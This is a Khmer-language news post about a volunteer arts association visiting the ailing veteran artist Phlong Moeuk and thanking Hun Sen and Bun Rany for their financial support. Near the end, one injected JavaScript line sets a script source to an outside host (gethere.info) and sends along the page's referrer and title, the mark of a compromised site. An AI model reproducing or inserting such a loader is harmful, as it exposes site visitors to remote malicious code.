ព្រឹតិ្តការណ៍ថ្មីៗ

លោកតា ផ្លុង មឿក កំពុងមានជំងឺរាំរ៉ៃ ទទួលបានការចុះសួរសុខទុក្ខពីសមាគមមិត្តសិល្ប:ស្មគ្រ័ចិត្តជួយសង្គម

3 ឆ្នាំ មុន 3 តូ សុផល

ភ្នំពេញ៖  នាព្រឹកថ្ងៃទី២៥ ខែសីហា ឆ្នាំ២០១៦ នេះ សមាគមមិត្តសិល្ប:ស្មគ្រ័ចិត្តជួយសង្គម បានចុះសួរសុខទុក្ខជាលើកទីពីរ ដល់លោកតា ផ្លុង មឿកជាសិល្បករជើងចាស់កំពុងមានជំងឺរាំរ៉ៃបាត់បង់សមត្ថភាពការងារជាយូរមកហើយ ។ បច្ចុប្បន្នលោកតា ផ្លុងមឿក មានសភាពទ្រុតទ្រោម បាត់បង់ការចងចាំច្រើន និង ស្ថិតក្នុងការព្យាបាលជាប្រចាំ ។

តាមការរៀបរាប់ពីកូនស្រីរបស់គាត់ បានប្រាប់សមាគមអោយបានដឹងថា បន្ទាប់ពីទទួលបានព័ត៌មានពីស្ថាន ភាពជំងឺរបស់លោកតា ផ្លុង មឿក សម្តេចតេជោ និង សម្តេចកិត្តិព្រឹទ្ធបណ្ឌិត បានជួយឧបត្ថម្ភជាទឹកប្រាក់ចំនួន ១ម៉ឺនដុល្លា រួមនិងប្រាក់ឧបត្ថម្ភជាប្រចាំខែ ចំនួន ៥០ម៉ឺនរៀលក្នុងមួយខែ ចាប់តាំងពីឆ្នាំ ២០១៣ មកម្លេះ ហើយប្រាក់ឧបត្ថម្ភនេះ កូនរបស់គាត់ក៏បានទៅបើកជាប្រចាំនៅ ខុទ្ទការល័យសម្តេចតេជោរហូតមកមិនដែលខាន។


លោកតា ផ្លុង មឿក ក៏នៅទទួលបានប្រាក់ចូលនិវត្តន៍ចំនួន ៣០ម៉ឺនរៀល ពីក្រសួងវប្បធម៏ និង វិចិត្រសិល្ប:ផងដែរ ហើយថ្មីៗនេះទៀត ប្រាក់ចូលនិវត្តន៍របស់លោកតាក៏បានឡើងដល់៣៨ម៉ឺនរៀល ។ កូនស្រីរបស់លោកតា ផ្លុងមឿក ក៏បានបញ្ជាក់ថាប្រាក់ឧបត្ថម្ភសរុបទាំងអស់ គឺទទួលបានចំនួន ៨៦ម៉ឺនរៀលដែរក្នុងមួយខែៗ ហើយត្បិតមែនតែប្រាក់ឧបត្ថម្ភទាំងអស់មិនអាចរ៉ាប់រងបន្ទុកចំណាយលើកការព្យាបាលជំងឺបានទាំងស្រុងមែន ក៍ប៉ុន្តែគឺបានសម្រាលនូវបន្ទុកចំណាយមួយចំនួនផងដែរ ។
ក្នុងនាមសមាគម សូមថ្លែងអំណរគុណ និង កោតសរសើរយ៉ាងក្រៃលែង ដល់សម្តេចតេជោ ហ៊ុន សែន និង សម្តេចកិតិ្តព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុន សែន ដែលតែងយកចិត្តទុកដាក់ចំពោះសុខទុក្ខ របស់ប្រជាពលរដ្ឋគ្រប់រូបដែលជួបការលំបាក ហើយពិតជាបន្ទុកមួយដ៏ធំធេង ចំពោះសម្តេចទាំងពីរ។
យើងខ្ញុំទាំងអស់គ្នា សូមគោរពជូនពរសម្តេចទាំងពីរ ទទួលបាននូវសុខភាពល្អ និង ជោគជ័យក្នុងការដឹកនាំប្រទេសអោយបានរីកចំរើនរុងរឿងទ្វេរឡើង ។

14068218_956129967865644_3406079042757250747_n 14089238_956129924532315_30698163691085018_n

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ